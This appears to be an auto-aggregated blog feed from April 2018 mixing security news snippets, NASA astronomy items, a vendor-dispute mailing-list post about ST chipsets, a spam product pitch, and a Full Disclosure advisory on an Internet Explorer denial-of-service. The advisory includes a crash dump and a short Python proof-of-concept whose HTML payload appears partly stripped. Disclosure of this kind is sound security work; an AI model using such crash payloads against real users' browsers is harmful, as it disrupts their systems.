Surge in Anonymous Asia Twitter Accounts Sparks Bot Fears

Quoting SecurityWeek: Hong Kong – It has been jokingly referred to as “Botmageddon”. But a surge in new, anonymous Twitter accounts across swathes of Southeast and East Asia has deepened fears the region is in the throes of US-style mass social media manipulation. SecurityWeek.

from Google Alert – anonymous https://ift.tt/2HjRyGj
via IFTTT

from Blogger http://insidenothing.blogspot.com/2018/04/surge-in-anonymous-asia-twitter.html
via IFTTT

Meteor Over Crater Lake

Did you see it? One of the more common questions during a meteor shower occurs because the time it takes for a meteor to flash is typically less than the time it takes for a head to turn. Possibly, though, the glory of seeing bright meteors shoot across and knowing that they were once small granules on another world might make it all worthwhile, even if your observing partner(s) could not share in every particular experience. Peaking late tonight, a dark sky should enable the Lyrids meteor shower to exhibit as many as 20 visible meteors per hour from some locations. In the featured composite of nine exposures taken during the 2012 shower, a bright Lyrid meteor streaks above picturesque Crater Lake in Oregon, USA. Snow covers the foreground, while the majestic central band of our home galaxy arches well behind the serene lake. Other meteor showers this year — and every year — include the Perseids in mid-August and the Leonids in mid-November. via NASA https://ift.tt/2qVMv8f

from Blogger http://insidenothing.blogspot.com/2018/04/meteor-over-crater-lake.html
via IFTTT

Flaw in LinkedIn AutoFill Plugin Lets Third-Party Sites Steal Your Data

Not just Facebook, a new vulnerability discovered in Linkedin’s popular AutoFill functionality found leaking its users’ sensitive information to third party websites without the user even knowing about it. LinkedIn provides an AutoFill plugin for a long time that other websites can use to let LinkedIn users quickly fill in profile data, including their full name, phone number, email address,

from The Hacker News https://ift.tt/2Hil0AG
via IFTTT

from Blogger http://insidenothing.blogspot.com/2018/04/flaw-in-linkedin-autofill-plugin-lets.html
via IFTTT

British Schoolboy Who Hacked CIA Director Gets 2-Year Prison Term

The British teenager who managed to hack into the online accounts of several high-profile US government employees sentenced to two years in prison on Friday. Kane Gamble, now 18, hacked into email accounts of former CIA director John Brennan, former Director of National Intelligence James Clapper, former FBI Deputy Director Mark Giuliano, and other senior FBI officials—all from his parent’s

from The Hacker News https://ift.tt/2HJB91c
via IFTTT

from Blogger http://insidenothing.blogspot.com/2018/04/british-schoolboy-who-hacked-cia.html
via IFTTT

[FD] [SE-2011-01] The origin and impact of vulnerabilities in ST chipsets

Hello All, We have published an initial document describing the origin and impact of the vulnerabilities discovered in ST chipsets along some rationale indicating why it’s worth to dig further into this case: https://ift.tt/2vt3C6C This document is a work in progress. As such, it will be updated once new information is acquired regarding the impact of the issues found. ST vulnerabilities are still a mystery to many and we keep receiving inquiries about them regardless of the fact that almost 6 years had passed since the disclosure. STMicroelectronics, although out of STB and DVB chipset business, has not provided us with any details regarding the impact of the issues found. We have reasons to believe that vulnerable IP (TKD Crypto core of STi7111 SoC) might be part of other ST chipsets and/or part of other vendors’ solutions, not necessarily related to PayTV industry (e-passports, banking cards and SIM cards). We have reasons to believe that ST actions were aimed to hide the impact of the issues found, that company’s shareholders were not aware of these vulnerabilities, their impact and associated liabilities. We have reasons to believe that the issues have not been resolved up to this day. In Mar 2018, we asked CERT-FR (French governmental CSIRT) and IT-CERT (CERT Nazionale Italia) for assistance aimed at obtaining information from STMicroelectronics regarding security issues found in their chipsets (ST is a French-Italian company and both French and Italian governments hold 13.8% of its stake each). For some unknown reason, both CERTs have stopped responding to our messages [1]. We are still to hear from US-CERT. Over the last 20+ years, we have been dealing with various vendors and ecosystems (desktop, cloud, mobile, etc.). The case of STMicroelectronics vulnerabilities is however truly unique as we have never met with such a persistent and long-term refusal to provide information pertaining to the impact and addressing of security vulnerabilities found. The usual “crisis management” conducted by vendors for disclosures of high impact flaws involve carefully-worded statements indicating that the issues affect older products only or in case of low / limited impact flaws, a vendor usually publishes a list of vulnerable products to clearly emphasize the low nature of the issues found. ST refusal to provide any information pertaining to the impact of the flaws found in its chipsets can be perceived in terms of intentionally hiding the impact of a much larger magnitude than anticipated by the reporting party, customers or the public. It could be that these actions are aimed at avoiding the liabilities associated with manufacturing flawed products, the costs of their recalls and/or replacements. ST has all the means to end any speculation pertaining to the nature of the issues found in its chipsets and their impact by simply delivering clear impact information to general public (vulnerable chipset models, whether vulnerable IP is used in other products, possible remediation steps, etc). Security Explorations will continue engaging various entities such as US-CERT in a goal to acquire accurate information pertaining to the impact and addressing of ST vulnerabilities. The newly published document and our SE-2011-01 Vendor Status page will reflect any new information acquired and the steps taken to obtain it. We are also ready to release to the public all unpublished bits pertaining to our research of ST chipsets such as SRP-2018-01 [2] material if deemed necessary. Thank you. Best Regards, Adam Gowdiak

Source: Gmail -> IFTTT-> Blogger

from Blogger http://insidenothing.blogspot.com/2018/04/fd-se-2011-01-origin-and-impact-of.html
via IFTTT

TESS Launch Close Up

NASA’s Transiting Exoplanet Survey Satellite (TESS) began its search for planets orbiting other stars by leaving planet Earth on April 18. The exoplanet hunter rode to orbit on top of a Falcon 9 rocket. The Falcon 9 is so designated for its 9 Merlin first stage engines seen in this sound-activated camera close-up from Space Launch Complex 40 at Cape Canaveral Air Force Station. In the coming weeks, TESS will use a series of thruster burns to boost it into a high-Earth, highly elliptical orbit. A lunar gravity assist maneuver will allow it to reach a previously untried stable orbit with half the orbital period of the Moon and a maximum distance from Earth of about 373,000 kilometers (232,000 miles). From there, TESS will carry out a two year survey to search for planets around the brightest and closest stars in the sky. via NASA https://ift.tt/2vChwDG

from Blogger http://insidenothing.blogspot.com/2018/04/tess-launch-close-up.html
via IFTTT

[FD] wifi and z-wave smart home from zibreo

Hi manager, I’m Chris from Zibreo, a leading producer of home automation based in Shenzhen, China. 1) We have WiFi smart plug,water detector, PIR motion sensor, RGB bulb etc, they can work with Amazon Alexa, Google home, IFTTT. 2) Z-Wave devices are compatible with all of z-wave controllers in the market such as Fibaro, smartthings etc. 3) Battery-operated with 2-year lifetime. Contact me if you need further details. Thanks. Chris

Source: Gmail -> IFTTT-> Blogger

from Blogger http://insidenothing.blogspot.com/2018/04/fd-wifi-and-z-wave-smart-home-from.html
via IFTTT

[FD] Microsoft (Win 10) InternetExplorer v11.371.16299.0 – Denial Of Service

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://ift.tt/2HEjHve [+] ISR: ApparitionSec Vendor: =======www.microsoft.com Product: ======== Internet Explorer (Windows 10) v11.371.16299.0 Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995. Vulnerability Type: ================== Denial Of Service CVE Reference: ============== N/A Security Issue: ================ A null pointer de-reference (read) results in an InternetExplorer Denial of Service (crash) when MSIE encounters an specially crafted HTML HREF tag containing an empty reference for certain Windows file types. Upon IE crash it will at times daringly attempt to restart itself, if that occurs and user is prompted by IE to restore their browser session, then selecting this option so far in my tests has shown to repeat the crash all over again. This can be leveraged by visiting a hostile webpage or link to crash an end users MSIE browser. Referencing some of the following extensions .exe:, .com:, .pif:, .bat: and .scr: should produce the same 🙂 Tested Windows 10 Stack Dump: ========== (2e8c.27e4): Access violation – code c0000005 (first/second chance not available) ntdll!NtWaitForMultipleObjects+0x14: 00007ffa`be5f0e14 c3 ret 0:015> r rax=000000000000005b rbx=0000000000000003 rcx=0000000000000003 rdx=000000cca6efd3a8 rsi=0000000000000000 rdi=0000000000000003 rip=00007ffabe5f0e14 rsp=000000cca6efcfa8 rbp=0000000000000000 r8=0000000000000000 r9=0000000000000000 r10=0000000000000000 r11=0000000000000246 r12=0000000000000010 r13=000000cca6efd3a8 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 ntdll!NtWaitForMultipleObjects+0x14: 00007ffa`be5f0e14 c3 ret CONTEXT: (.ecxr) rax=0000000000000000 rbx=000001fd4a2ec9d8 rcx=0000000000000000 rdx=00007ffabb499398 rsi=000001fd4a5b0ce0 rdi=0000000000000000 rip=00007ffabb7fc646 rsp=000000cca6efe4f8 rbp=000000cca6efe600 r8=0000000000000000 r9=0000000000008000 r10=00007ffabb499398 r11=0000000000000000 r12=0000000000000000 r13=00007ffabb48d060 r14=0000000000000002 r15=0000000000000001 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 KERNELBASE!StrCmpICW+0x6: 00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11] ds:00000000`00000000=???? Resetting default scope FAULTING_IP: KERNELBASE!StrCmpICW+6 00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11] EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 00007ffabb7fc646 (KERNELBASE!StrCmpICW+0x0000000000000006) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 0000000000000000 Parameter[1]: 0000000000000000 Attempt to read from address 0000000000000000 DEFAULT_BUCKET_ID: NULL_POINTER_READ PROCESS_NAME: iexplore.exe POC video URL: ==============https://ift.tt/2JeIZx3 Exploit/POC: ============ 1) Run below python script to create “IE-Win10-Crasha.html” 2) Open IE-Win10-Crasha.html in InternetExplorer v11.371.16299 on Windows 10 payload=(‘
\n’+ ‘
MSIE v11.371.16299 Denial Of Service by hyp3rlinx
\n’+ ‘crashy ware shee\n’+ ‘
\n’+ ‘Tested successfully on Windows 10\n’+ ‘

//
‘) file=open(“IE-Win10-Crasha.html”,”w”) file.write(payload) file.close() print ‘MS InternetExplorer (Win 10) ‘ print ‘Denial Of Service File Created.’ print ‘hyp3rlinx’ Network Access: =============== Remote Severity: ========= Medium Disclosure Timeline: ============================= Vendor Notification: April 18, 2018 vendor closes thread : April 19, 2018 April 20, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

Source: Gmail -> IFTTT-> Blogger

from Blogger http://insidenothing.blogspot.com/2018/04/fd-microsoft-win-10-internetexplorer.html
via IFTTT